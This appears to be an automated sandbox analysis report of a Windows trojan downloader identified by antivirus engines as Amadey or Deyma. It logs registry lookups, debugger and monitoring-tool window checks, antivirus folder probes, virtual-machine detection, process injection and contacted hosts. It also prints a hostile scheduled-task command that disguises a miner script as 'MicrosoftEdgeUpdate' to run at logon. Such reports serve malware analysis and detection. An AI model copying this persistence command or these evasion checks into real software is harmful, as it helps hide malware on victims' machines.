RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{cd1d4012-e125-4e78-896f-4307e1b9857d}
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x00000001
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{cd1d4012-e125-4e78-896f-4307e1b9857d}
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{cd1d4012-e125-4e78-896f-4307e1b9857d}.RebootRequired
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x00000001
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{cd1d4012-e125-4e78-896f-4307e1b9857d}.RebootRequired
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{cd1d4012-e125-4e78-896f-4307e1b9857d}
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x00000001
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{cd1d4012-e125-4e78-896f-4307e1b9857d}
2 0
cmdline net session
cmdline schtasks /Create /F /SC ONLOGON /RL HIGHEST /TN "MicrosoftEdgeUpdate" /TR "\"C:\Users\test22\AppData\Roaming\SystemService\miner_loop.bat\"" /RU "test22"
host 185.215.113.41
host 185.215.113.59
host 193.233.237.109
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
file \??\SICE
file \??\SIWVID
file \??\NTICE
Time & API Arguments Status Return Repeated

FindWindowA

class_name: OLLYDBG
window_name:
0 0

FindWindowA

class_name: GBDYLLO
window_name:
0 0

FindWindowA

class_name: pediy06
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: File Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: #0
window_name: Process Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: RegmonClass
window_name:
0 0

FindWindowA

class_name: RegmonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: Registry Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: 18467-41
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: File Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: #0
window_name: Process Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: OLLYDBG
window_name:
0 0

FindWindowA

class_name: GBDYLLO
window_name:
0 0

FindWindowA

class_name: pediy06
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: File Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: #0
window_name: Process Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: RegmonClass
window_name:
0 0

FindWindowA

class_name: RegmonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: Registry Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: 18467-41
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: File Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: #0
window_name: Process Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: OLLYDBG
window_name:
0 0

FindWindowA

class_name: GBDYLLO
window_name:
0 0

FindWindowA

class_name: pediy06
window_name:
0 0

FindWindowA

class_name: OLLYDBG
window_name:
0 0

FindWindowA

class_name: GBDYLLO
window_name:
0 0

FindWindowA

class_name: pediy06
window_name:
0 0

FindWindowA

class_name: Regmonclass
window_name:
0 0

FindWindowA

class_name: Regmonclass
window_name:
0 0

FindWindowA

class_name: 18467-41
window_name:
0 0

FindWindowA

class_name: Filemonclass
window_name:
0 0

FindWindowA

class_name: Filemonclass
window_name:
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: OLLYDBG
window_name:
0 0

FindWindowA

class_name: GBDYLLO
window_name:
0 0

FindWindowA

class_name: pediy06
window_name:
0 0

FindWindowA

class_name: OLLYDBG
window_name:
0 0
Time & API Arguments Status Return Repeated

NtQuerySystemInformation

information_class: 8 (SystemProcessorPerformanceInformation)
1 0 0
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
file C:\Windows\Tasks\namez.job
cmdline schtasks /Create /F /SC ONLOGON /RL HIGHEST /TN "MicrosoftEdgeUpdate" /TR "\"C:\Users\test22\AppData\Roaming\SystemService\miner_loop.bat\"" /RU "test22"
Process injection Process 1228 resumed a thread in remote process 2964
Process injection Process 2508 resumed a thread in remote process 1552
Process injection Process 2508 resumed a thread in remote process 200
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000138
suspend_count: 0
process_identifier: 2964
1 0 0

NtResumeThread

thread_handle: 0x000000000000006c
suspend_count: 0
process_identifier: 1552
1 0 0

NtResumeThread

thread_handle: 0x0000000000000074
suspend_count: 0
process_identifier: 200
1 0 0
option -windowstyle hidden value Attempts to execute command with a hidden window
cmdline schtasks /Create /F /SC ONLOGON /RL HIGHEST /TN "MicrosoftEdgeUpdate" /TR "\"C:\Users\test22\AppData\Roaming\SystemService\miner_loop.bat\"" /RU "test22"
Time & API Arguments Status Return Repeated

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: ed 64 8f 05 00 00 00 00 57 89 14 24 89 0c 24 89
exception.symbol: 2m8357+0x1f3062
exception.instruction: in eax, dx
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2044002
exception.address: 0x1133062
registers.esp: 3800404
registers.edi: 1259
registers.eax: 1447909480
registers.ebp: 4006408212
registers.edx: 22104
registers.ebx: 1971327157
registers.esi: 18017821
registers.ecx: 20
1 0 0
Bkav W32.AIDetectMalware
MicroWorld-eScan Gen:Variant.Doina.48214
CAT-QuickHeal Trojandownloader.Deyma
Skyhigh BehavesLike.Win32.Lockbit.vc
ALYac Gen:Variant.Doina.48214
Cylance Unsafe
Sangfor Trojan.Win32.Save.a
CrowdStrike win/malicious_confidence_100% (W)
K7GW Trojan ( 005aad751 )
K7AntiVirus Trojan ( 005aad751 )
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 multiple detections
APEX Malicious
Cynet Malicious (score: 100)
Kaspersky HEUR:Trojan-Downloader.Win32.Deyma.gen
NANO-Antivirus Trojan.Win32.Deyma.kwwbbz
Rising Trojan.Agent!1.12B48 (CLASSIC)
F-Secure Trojan.TR/Redcap.tclid
DrWeb Trojan.Packed2.48355
VIPRE Gen:Variant.Doina.48214
TrendMicro Trojan.Win32.AMADEY.YXFDOZ
Trapmine malicious.moderate.ml.score
Sophos Troj/Amadey-O
SentinelOne Static AI - Malicious SFX
Google Detected
Avira TR/Redcap.tclid
Antiy-AVL Trojan[Downloader]/Win32.Deyma
Kingsoft malware.kb.a.881
Gridinsoft Spy.Win32.Redline.lu!heur
Microsoft Trojan:Win32/Multiverze!rfn
ZoneAlarm Troj/Amadey-O
Varist W32/Kryptik.JKR.gen!Eldorado
DeepInstinct MALICIOUS
Malwarebytes Malware.AI.3966811931
Ikarus Trojan.MSIL.Disabler
Zoner Probably Heur.ExeHeaderL
TrendMicro-HouseCall Trojan.Win32.VSX.PE04C9V
Tencent Malware.Win32.Gencirc.146b1fd4
huorong Trojan/Generic!23958BC2A306C122
MaxSecure Trojan.Malware.300983.susgen
Fortinet W32/Amadey.A!tr.dldr